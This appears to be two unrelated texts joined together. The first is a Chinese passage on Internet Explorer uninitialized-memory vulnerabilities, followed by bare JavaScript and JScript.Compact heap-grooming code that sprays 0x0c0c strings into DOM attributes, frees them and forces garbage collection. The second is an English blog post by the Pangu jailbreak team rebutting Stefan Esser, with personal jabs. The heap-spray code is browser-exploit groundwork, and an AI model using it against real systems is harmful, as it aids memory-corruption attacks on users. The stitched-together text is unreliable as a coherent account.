在微软的IE历史补丁上,跨域漏洞一度占据主要位置,Active控件也曾大量的出过问题,除去这两类,微软也修补过不少的溢出和一些指针空挂漏洞。到了最近几年,User After Free问题非常多,兼有一些类型混淆的漏洞。但总的来说,内存未初始化漏洞极其稀少,而且有关利用并没有见诸网络,加上传说本次Pwn2Own攻破IE的漏洞就是一个内存未初始化漏洞,所以我们比较感兴趣,并稍微查阅了一些MSDN相关文档。
var i=0;
var vault=new Array();
var str=unescape("%u0c0c%u0c0c");
while (str.length<0xf0) str=str+str;
str=str.substr(0, (0x20-2)/2);
for (i=0;i<1000;i++) {
vault.push(document.createElement("div"));
vault[i].setAttribute("title",str);}
for (i=0;i<1000;i++) vault[i].setAttribute("title","");
CollectGarbage();
var longstr="";
var sprtr=" ";
for(i=0;i<1000;i++)
longstr+=String.fromCharCode((i/100)%100+0x21,i%100+0x21,0x41,0x41,0x41,0x41).substr(0,3)+sprtr;
var vault=longstr.split(sprtr);
vault=null;
CollectGarbage();
<script language="JScript.Compact">
var longstr="";
var sprtr=" ";
for(i=0;i<1000;i++)
longstr+=String.fromCharCode((i/100)%100+0x21,i%100+0x21,0x41,0x41,0x41,0x41).substr(0,3)+sprtr;
var vault=longstr.split(sprtr);
vault=null;
CollectGarbage();
</script>
After the release of our blogpost, it is very funny to see Mr. Stefan continues to post unwarranted and spiteful conjectures on Twitter and his blogpost. We suggest the reader refer to our blogpost as well as his blogpost to understand the backgroud.
Among his numerous discriminations and accusations against us (such as calling us thieves and criminals), the main one is that he claims that we have been trying to buy/acquire vulnerabilities to achieve jailbreaks. The “horribly” strong evidence is a piece of chat history between him and @windknown, a member of our team. Although we think it is immoral to post private messages to the public, we do not mind showing the full chat history, and let the truth speak for itself.
The chat happened at June 23, 2014, after the first release of Pangu 7. After receiving his complaint, @windknown tried to communicate with Stefan to fix the “friendship” with Stefan. They already knew each other since 2009.
At the beginning, we apologized and suggested that Pangu Team should officially acknowledge Stefan for his contribution to Pangu 7. In fact, we did acknowledge him on both the website and the release notes of the jailbreak tool, before replacing his vulnerability with our own.
Next, we explained that we didn’t realize that we were not allowed to use the vulnerability which was discussed in the training. We even tried to share a different vulnerability discovered by our team with Stefan, in order to compensate his “lost”. We eventually used that vulnerability to replace the bug discussed in his training in Pangu jailbreak tool. It clearly indicates that there is no any need for us to buy any vulnerabilities for jailbreak at all, because we already had enough vulnerabilities for our jailbreak tool.
Then, we offered a more straightforward option, i.e., financial compensation. Since we were told that Stefan Esser has done some consulting projects for security companies in which he needs to provide details of vulnerabilities he discovered (a kind of business by selling bugs), we felt that using the vulnerability may affect Stefan’s business and thus tried to financially compensate him. Apparently, we cannot afford one million dollars, LOL.
Finally, about the new lightning debug cable, Stefan mentioned during the training course that he was very interested in it because it would be very helpful for his kernel debugging or iBoot stuff. He also asked us whether or not we were able to find such a cable in China. That’s why we propose to find such a cable so that we could compensate him. It is not very difficult to find similar cables in electronic markets like Zhongguancun.
So far, it is very clear that we tried our best to make Stefan happy and satisfied, but failed. We have to emphasize that trying to financially compensate Stefan happened after the release of Pangu 7. The fact is so straightforward, i.e., we used his vulnerability that we learned from the training, and he complained, so we proposed several ways including financial compensation to fix the mistake we made.
However, Stefan’s explanation and his blogpost misled the reader on purpose. Using a piece of the chat history without the context, Stefan deliberately misled the reader to believe the Pangu Team tried to buy vulnerability from him for jailbreak, which is definitely not true.
Ok, now let’s move to the more funny parts and see how his logic works.
He mentioned that “They even let one of their friends ask in the QA session of my talk at SyScan if I had physical proof for some of the things, so that they could get away with claiming that this is not true…”
After reading the text above, we have to suspect that Stefan might have persecutory delusions. In fact, how can we predict what Stefan would present at the conference? How can we arrange a friend to ask him a question? So far we still have no idea who asked what question. But It is completely not surprising if attendees challenge such a ridiculous judgment and ask for the existence of any evidences.
update(Apr 11, 2015): We just learned that @xi4oyu is the attendee who asked whether Stefan has any evidence after the uncomfortable talk. Unfortunately, he was misunderstood as if he were instructed by us, probably for language reasons. He posted several tweets to clarify the fact. We highly appreciate him for raising the question and clarifying the fact.
He also pointed out that “But it is also questionable how they can afford to organize security conferences in expensive chinese hotels when they only get these small amounts.”
Thanks for the advertisement. Following his logic, any organizers of security conferences must have unclear sponsorships, otherwise how can they run these conferences? We are running a mobile security conference in Shanghai, please visit MOSEC website for more information. This conference is co-organized by our team and PoC which is a security conference in South Korea with 9 years history. We appreciate the supports and budgets from our partners and conference sponsors. Tickets are on sale now, with a reasonable price.
Stefan said we started the war. If you took a look at his tweets, you can easily find that, he kept attacking us, even the people who tried to defend for us, but we always kept silent until the release of his racism talk at Syscan 2015. Again, we wish all of these meaningless stuff end as soon as possible. However, if Stefan continues to distribute his unwarranted and spiteful conjectures and rumors, we will not keep silent.
Almost forgot to mention that we also wasted many hours, the same as Stefan, on writing the blog. Because of this, we even haven’t got time to test our exploits on iOS 8.3.
